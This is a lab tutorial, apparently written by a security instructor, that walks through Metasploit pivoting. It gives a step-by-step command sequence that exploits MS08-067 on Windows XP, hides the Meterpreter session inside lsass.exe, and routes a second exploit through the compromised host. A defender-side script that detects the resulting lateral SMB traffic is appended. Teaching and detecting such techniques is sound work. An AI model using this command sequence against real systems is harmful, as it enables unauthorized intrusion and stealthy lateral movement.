Metasploit Pivoting


Pivoting refers to the practice of compromising a computer or server on a network and then using that host to attack other systems from inside the network. Because the attacks are launched from within, the attacker bypasses perimeter firewall policy and can run attacks that would not be possible from outside the network. Launching attacks from a compromised internal system also improves the attacker's chances of remaining undetected and leaves less of a footprint.


In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then, using pivoting through that session, exploit a second host on the network.

Requirements: The pentest exercise was conducted from the BackTrack 5 VMware virtual machine against two hosts running Windows XP Pro Service Pack 2.

Exploit steps:

  1. Open a terminal in BackTrack and enter the following commands:
  2. # msfconsole
  3. msf > show exploits
  4. msf > use windows/smb/ms08_067_netapi
  5. msf exploit(ms08_067_netapi) > show payloads
  6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
  7. msf exploit(ms08_067_netapi) > show options
  8. msf exploit(ms08_067_netapi) > set RHOST <1st victim's ip address>
    RHOST => <ip address>
  9. msf exploit(ms08_067_netapi) > exploit        //if successful, you will see a meterpreter prompt
  10. meterpreter >                    //if you see this you have a Meterpreter shell
  11. meterpreter > shell           //this gives you a Windows command prompt/shell
  12. C:\WINDOWS\system32> exit             //exit the Windows command prompt
  13. meterpreter > getpid                 //note the process id that Meterpreter is using
  14. meterpreter > ps              //list all running processes on the victim machine. What process does your PID show up as? svchost.exe? Look for the process "lsass.exe"; it may show up as PID 700
  15. meterpreter > migrate 700           //migrate Meterpreter into the lsass.exe process
  16. meterpreter > getpid                     //verify your new process ID
  17. ctrl+z                             //press ctrl+z to background the Meterpreter session
  18. msf > route add <2nd victim's ip address> <subnet mask> <session id #>           //route the new attack to victim 2 through the backgrounded session
  19. msf > use windows/smb/ms08_067_netapi
  20. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  21. msf exploit(ms08_067_netapi) > set RHOST <2nd victim's ip address>
  22. msf exploit(ms08_067_netapi) > exploit
  23. meterpreter >                           //success!!!!

Now that you have a Meterpreter shell, the sky is the limit. Run the help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading a file to and downloading a file from the victim. Here are some of the basic Meterpreter commands:

meterpreter > help                     //help menu
meterpreter > background         //backgrounds the current session
meterpreter > exit                      //terminate the meterpreter session
meterpreter > quit                      //terminate the meterpreter session
meterpreter > write                    //writes data to a channel
meterpreter > mkdir                  //creates a directory
meterpreter > download            //download a file or directory
meterpreter > upload                //upload a file or directory
meterpreter > search                //search for a file
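As an added defender-side example (not part of the original post), the script below shows what the pivot in steps 15 to 23 looks like from the network and how to flag it: after the migrate step the Meterpreter channel lives inside lsass.exe, so the routed attack on victim 2 appears as an SMB (port 445) connection from one workstation to another, opened by lsass.exe. The log format, subnet and addresses are constructed assumptions, modelled loosely on Sysmon network-connection events.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumptions (constructed for this example): clients live in one /24 and
# only the listed hosts are legitimate SMB servers for them.
WORKSTATIONS = ip_network("192.168.56.0/24")
SMB_SERVERS = {ip_address("192.168.56.5")}

# Constructed network-connection events: timestamp, source, destination,
# destination port and the process that opened the connection.
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z src=192.168.56.101 dst=192.168.56.5 dport=445 image=C:\Windows\explorer.exe
2024-05-01T10:02:13Z src=192.168.56.101 dst=192.168.56.102 dport=445 image=C:\WINDOWS\system32\lsass.exe
2024-05-01T10:02:14Z src=192.168.56.101 dst=192.168.56.103 dport=445 image=C:\WINDOWS\system32\lsass.exe
2024-05-01T10:03:00Z src=192.168.56.102 dst=192.168.56.5 dport=445 image=C:\Windows\explorer.exe
2024-05-01T10:04:00Z src=192.168.56.102 dst=192.168.56.103 dport=80 image=C:\Windows\system32\svchost.exe
"""


def parse_event(line):
    """Parse one log line into a dict; the first token is the timestamp."""
    ts, *pairs = line.split()
    ev = dict(p.split("=", 1) for p in pairs)
    ev["ts"] = ts
    return ev


def is_lateral_smb(ev):
    """SMB from a workstation to a peer workstation that is not a known
    file server: the network footprint of the pivot, whatever the process."""
    src, dst = ip_address(ev["src"]), ip_address(ev["dst"])
    return (ev["dport"] == "445"
            and src in WORKSTATIONS and dst in WORKSTATIONS
            and dst not in SMB_SERVERS)


def from_lsass(ev):
    """lsass.exe acting as an SMB client to a peer is the trace of step 15."""
    return ev["image"].lower().endswith("lsass.exe")


def find_pivots(log_text):
    """Map each source host to the peers it reached on 445, with a flag
    saying whether lsass.exe opened the connection."""
    hits = defaultdict(list)
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if is_lateral_smb(ev):
            hits[ev["src"]].append((ev["dst"], from_lsass(ev)))
    return dict(hits)


if __name__ == "__main__":
    for src, peers in find_pivots(SAMPLE_LOG).items():
        print(f"possible pivot host {src}: {peers}")
```

Only 192.168.56.101 is reported: its two lsass.exe connections to peer workstations match, while ordinary SMB to the file server and the non-SMB connection from .102 do not.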

Author: Dan

Dan teaches computer networking and security classes at Central Oregon Community College.
